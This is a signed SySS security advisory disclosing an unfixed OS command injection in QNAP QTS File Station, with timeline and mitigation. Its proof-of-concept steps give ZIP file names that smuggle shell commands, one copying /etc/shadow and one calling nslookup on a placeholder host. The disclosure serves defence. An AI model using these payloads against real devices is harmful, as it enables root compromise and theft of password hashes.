-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-048
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:


The SySS GmbH found an os command injection in the file station of the
current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC, Build 20160311)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current
dir]" | bash ; echo .zip

3. Right-click on the ZIP file and select Extract > Extract to 
[pre-selected directory with the name of the ZIP file]
(Extract > last entry)

4. The contained code will be exected, in this case: /etc/shadow copied
to the current directory. Other code can of course be run as well,
e.g. to display some strings on the front-display of the QNAP (tested
with a 470 Pro) name the ZIP file like this and extract it:

a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip

Depending on the system this might not work out of the box.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC, Build 20160601)

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

test$(nslookup examplehost).zip

3. Right-click on the ZIP file and select Extract > Extract files

4. The contained code will be executed as can be confirmed by listening 
on the corresponding network.

The original exploit (Extract > last entry) will not work on the current
release of QTS. This exploit should work on previous versions of QTS as
well.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Report updated to adress (minor) changes in build 20160601
2016-07-06: Updated report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for QNAP QTS
    http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-048
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.nerz-at-syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7
hPsm2bZPiPyynxK79H8zUIaQylFjXRnyfBhPZ7EjYI2riXkya6dk6CT7qtpt2Ljk
tpBFgduJCz/a+iFsa7yCk5U6cFLi4vpcXVVE4DUf/BvTwqM4y715sTdGdOWrg00=
=PDqZ
-----END PGP SIGNATURE-----